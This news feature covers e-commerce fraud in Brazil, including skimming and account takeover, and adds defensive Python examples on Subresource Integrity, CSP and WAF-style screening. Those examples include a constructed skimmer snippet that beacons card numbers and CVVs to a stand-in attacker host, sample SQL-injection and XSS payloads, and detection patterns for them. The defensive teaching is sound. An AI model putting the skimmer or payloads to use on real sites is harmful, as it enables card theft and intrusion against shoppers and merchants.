An innocent click, a modest purchase, an unmissable discount. Everything seems safe, until the bill arrives with an amount you don't recognize. Behind the scenes of e-commerce, while consumers enjoy the convenience of digital shopping, an invisible war is waged every day against increasingly sophisticated scams.
In 2024, more than half of Brazilians had been victims of some type of fraud, according to Serasa Experian. And the impact is real: 54.2% reported financial loss, many of them without even realizing they had been scammed. Where fraud used to be mass-scale and blatant, today it is surgical, silent, and expensive. The average value of a fraudulent order has risen 30% and now exceeds R$1,300.
Crime has evolved, and digital security needs to keep up. E-commerce is the new playground for cybercriminals. Data from Febraban (the Brazilian Federation of Banks) shows that financial losses from digital fraud in Brazil reached R$10.1 billion in 2024, 17% more than the previous year. “The digital environment, especially for e-commerce, has become a minefield,” warns Wagner Elias, CEO of Conviso, a company specializing in application security.
And the enemy doesn't sleep. The threats are varied: phishing attacks (15% of cases), stolen credentials (16%), and even malicious insiders, the latter carrying the highest average cost per breach on the list, US$4.99 million.
Elias explains that two of the most common techniques are digital skimming and account takeover (ATO). In skimming, the criminal injects malicious code directly into the payment page, where it captures card data as the customer types it. ATO is more methodical: using leaked credentials, the attacker logs in to real accounts, changes the password, and makes purchases. According to the company AllowMe, 72% of digital retail fraud comes from these unauthorized accesses.
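The skimming scenario described above, as an added example (this is not code from the article, from Conviso or from AllowMe): a checkout page loads a third-party script that has been tampered with on the CDN so that it beacons the card fields to an attacker-controlled host. Subresource Integrity (SRI) makes the browser refuse the modified file, and a Content-Security-Policy `connect-src` list closes the exfiltration channel even if malicious script does run. The script contents, the host names (shop.merchant.example, cdn-metrics.example and the others), and the policy are constructed for the example; the CSP evaluator is a deliberate simplification that handles only `'self'` and exact origins.

```python
"""Digital skimming defenses: Subresource Integrity and a connect-src policy.

Added example, not the article's or any vendor's code. Scripts, hosts and
policy below are constructed for illustration.
"""
import base64
import hashlib
from urllib.parse import urlsplit

# Constructed: the vetted third-party script the checkout page loads.
ORIGINAL_SCRIPT = b"window.Checkout = { formatPan: function (pan) { return pan.replace(/\\s+/g, ''); } };\n"

# Constructed: the same file after a skimmer was appended to it on the CDN.
# It hooks form submission and beacons the card fields to a hypothetical
# attacker host (cdn-metrics.example).
SKIMMED_SCRIPT = ORIGINAL_SCRIPT + (
    b"document.addEventListener('submit', function (e) {\n"
    b"  var f = new FormData(e.target);\n"
    b"  navigator.sendBeacon('https://cdn-metrics.example/collect',\n"
    b"    JSON.stringify({pan: f.get('card_number'), cvv: f.get('cvv')}));\n"
    b"});\n"
)

PAGE_ORIGIN = "https://shop.merchant.example"  # constructed merchant origin
CHECKOUT_CSP = (  # constructed policy for the payment page
    "default-src 'self'; "
    "script-src 'self' https://cdn.merchant.example; "
    "connect-src 'self' https://api.merchant.example"
)


def sri_hash(script: bytes, algo: str = "sha384") -> str:
    """Value for the integrity attribute: '<algo>-<base64 digest>' (sha256, sha384 or sha512)."""
    digest = hashlib.new(algo, script).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_verify(script: bytes, integrity: str) -> bool:
    """What the browser does before executing: recompute the digest of the bytes it fetched."""
    algo, _, _ = integrity.partition("-")
    return sri_hash(script, algo) == integrity


def script_tag(src: str, script: bytes) -> str:
    """The tag the merchant deploys; crossorigin is required for SRI on cross-origin scripts."""
    return f'<script src="{src}" integrity="{sri_hash(script)}" crossorigin="anonymous"></script>'


def csp_allows_connect(policy: str, url: str, page_origin: str = PAGE_ORIGIN) -> bool:
    """Simplified connect-src evaluation: 'self' and exact origins only (no wildcards, nonces or hashes).

    connect-src governs fetch, XHR, WebSocket and sendBeacon, which are the channels
    a skimmer uses to send captured card data out of the page.
    """
    directives = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0]] = parts[1:]
    sources = directives.get("connect-src", directives.get("default-src", []))
    allowed = {page_origin if s == "'self'" else s for s in sources}
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}" in allowed


if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.merchant.example/checkout.js", ORIGINAL_SCRIPT))
    print("original script verifies:", sri_verify(ORIGINAL_SCRIPT, pinned))
    print("skimmed script verifies: ", sri_verify(SKIMMED_SCRIPT, pinned))
    print("exfil allowed by CSP:", csp_allows_connect(CHECKOUT_CSP, "https://cdn-metrics.example/collect"))
```

SRI only protects scripts whose bytes are fixed at deployment time, and it does nothing for code the attacker injects directly into the page HTML on a compromised server; that case calls for script inventory and tamper detection on the payment page, which PCI DSS v4.0 makes explicit in requirements 6.4.3 and 11.6.1.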
Their preferred targets? Games, cell phones, computers, and electronics: products with high liquidity on the informal market and easy resale. Meanwhile, scammers' preferred payment method continues to be the credit card. The reason is simple: purchases are quick, verification is minimal, and the fraud is only discovered when the bill arrives.
THE FIGHT
And what can be done? For Elias, the answer lies in technology, but above all in planning security from the very beginning of application development. “The answer lies in technology, yes, but above all, in how it's implemented. Leaving security considerations until the system is up and running is a fatal mistake. Practices like PCI DSS must be incorporated from the beginning of development, and investment must be made in tools like WAFs to protect websites against attacks in real time,” says Wagner Elias.
This is where tools like WAFs (Web Application Firewalls) come in: they monitor traffic in real time, block suspicious patterns, and protect websites from attacks such as code injection and unauthorized access. The use of AI (Artificial Intelligence) has also become important in anticipating malicious behavior, reducing breach costs by up to US$2.2 million, according to IBM's “Cost of a Data Breach 2024” study.
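To make concrete what “block suspicious patterns” means for a store, here is an added example (not the article's, Conviso's, or any WAF vendor's code) of the two checks a WAF rule set in front of a checkout applies: decoding request parameters and matching injection signatures, and spotting the login-velocity pattern of credential stuffing that precedes account takeover. The log lines, IP addresses, paths, rule names and thresholds are all constructed for the example.

```python
"""Minimal WAF-style screening of checkout traffic.

Added example, not the article's or any vendor's code. The request log and
the rule set below are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed log: timestamp, client IP, method, target, status, username ('-' when not a login).
REQUEST_LOG = [
    "2024-11-03T10:00:01Z 198.51.100.7 GET /product?id=42 200 -",
    "2024-11-03T10:00:02Z 198.51.100.7 GET /product?id=42%27%20OR%20%271%27%3D%271 200 -",
    "2024-11-03T10:00:03Z 203.0.113.9 GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E 200 -",
    "2024-11-03T10:00:04Z 198.51.100.7 POST /login 200 maria",
    "2024-11-03T10:00:10Z 203.0.113.9 POST /login 401 ana",
    "2024-11-03T10:00:11Z 203.0.113.9 POST /login 401 bruno",
    "2024-11-03T10:00:12Z 203.0.113.9 POST /login 401 carla",
    "2024-11-03T10:00:13Z 203.0.113.9 POST /login 401 diego",
    "2024-11-03T10:00:14Z 203.0.113.9 POST /login 401 elisa",
    "2024-11-03T10:00:15Z 203.0.113.9 POST /login 200 fabio",
    "2024-11-03T10:05:00Z 192.0.2.33 POST /login 401 maria",
    "2024-11-03T10:05:30Z 192.0.2.33 POST /login 401 maria",
]

# Constructed signature set; a production WAF ships hundreds of these (e.g. the OWASP CRS).
INJECTION_RULES = [
    ("sqli_tautology", re.compile(r"""['"]\s*(or|and)\s+['"]?\w+['"]?\s*=""", re.I)),
    ("sqli_union", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("sqli_stacked", re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I)),
    ("xss_tag", re.compile(r"<\s*script\b|javascript:", re.I)),
    ("xss_handler", re.compile(r"\bon\w+\s*=", re.I)),
]


def parse_line(line: str) -> dict:
    """Split one constructed log line into typed fields."""
    ts, ip, method, target, status, user = line.split()
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "ip": ip, "method": method, "target": target,
        "status": int(status), "user": None if user == "-" else user,
    }


def injection_findings(target: str) -> list:
    """Decode each query parameter (twice, to catch double encoding) and match the signatures."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)
        for rule, pattern in INJECTION_RULES:
            if pattern.search(decoded):
                findings.append((rule, name, decoded))
    return findings


def stuffing_findings(entries: list, window=timedelta(seconds=60), threshold: int = 5) -> list:
    """Flag an IP whose failed logins span >= threshold distinct accounts inside one window.

    One account failing repeatedly is a forgotten password or a targeted guess; many
    different accounts failing from one source is a leaked-credential list being replayed.
    """
    failed = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["target"] == "/login" and e["status"] == 401 and e["user"]:
            failed[e["ip"]].append((e["ts"], e["user"]))
    findings = []
    for ip, attempts in failed.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(users) >= threshold:
                findings.append((ip, sorted(users)))
                break
    return findings


def screen(log_lines: list) -> list:
    """Run both checks and return one alert dict per finding."""
    entries = [parse_line(line) for line in log_lines]
    alerts = []
    for e in entries:
        for rule, param, value in injection_findings(e["target"]):
            alerts.append({"ip": e["ip"], "rule": rule, "evidence": f"{param}={value}"})
    for ip, users in stuffing_findings(entries):
        alerts.append({"ip": ip, "rule": "credential_stuffing", "evidence": ",".join(users)})
    return alerts


if __name__ == "__main__":
    for alert in screen(REQUEST_LOG):
        print(alert)
```

The velocity rule is the one that matters for account takeover: a signature-only WAF sees each login attempt as a perfectly well-formed request, so the stuffing pattern is only visible when attempts are correlated per source over time.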
Another essential point is the use of practices compliant with PCI DSS (Payment Card Industry Data Security Standard), a set of international standards that help protect card transactions. “Companies that operate with payment data must, both by obligation and for business intelligence, strictly follow PCI. This is what separates a secure system from an open door to fraud,” adds Elias.
Even with technological advances, the average time to identify and contain a breach is still long: 258 days. When stolen credentials are involved, it can reach 292 days, almost a year. Part of the blame lies with the shortage of specialized professionals, which grew 26.2% last year and adds US$1.76 million to the cost of a breach.
However, the expert warns: those who invest in automation, security from the ground up, and attack simulations—known as penetration tests—have a better chance of emerging unscathed or, at least, reducing the damage.
Reports from leading cybersecurity authorities confirm the effectiveness of PCI DSS and WAF protection: according to Verizon’s DBIR 2024, PCI DSS compliance reduces security incidents by 52%, while WAFs block up to 80% of web application attacks. IBM’s Cost of a Data Breach 2023 study reveals that companies with WAFs save $1.4 million per breach, and PCI DSS speeds up breach response time by 54%. When combined, these solutions can reduce financial losses by up to 75%, according to the Ponemon Institute (2024).
“Thus, companies that follow the PCI DSS standard have half the problems with data breaches, and Web Application Firewalls (WAFs) prevent 8 out of 10 hacker attacks. Those who use both technologies together limit financial losses to just 25% of the amount normally expected after breaches,” he explains.
In the US, a data breach costs an average of US$9.36 million, the highest in the world for the 14th year in a row. There, 63% of companies already admit they will pass this cost on to customers, which shows that investing in security isn't just a precaution: it's a matter of competitiveness and image. Elias concludes: “In times of booming e-commerce and valuable data, ignoring digital security means leaving money on the table, compromising revenue and reputation at the same time. It also means losing customer trust and brand credibility.”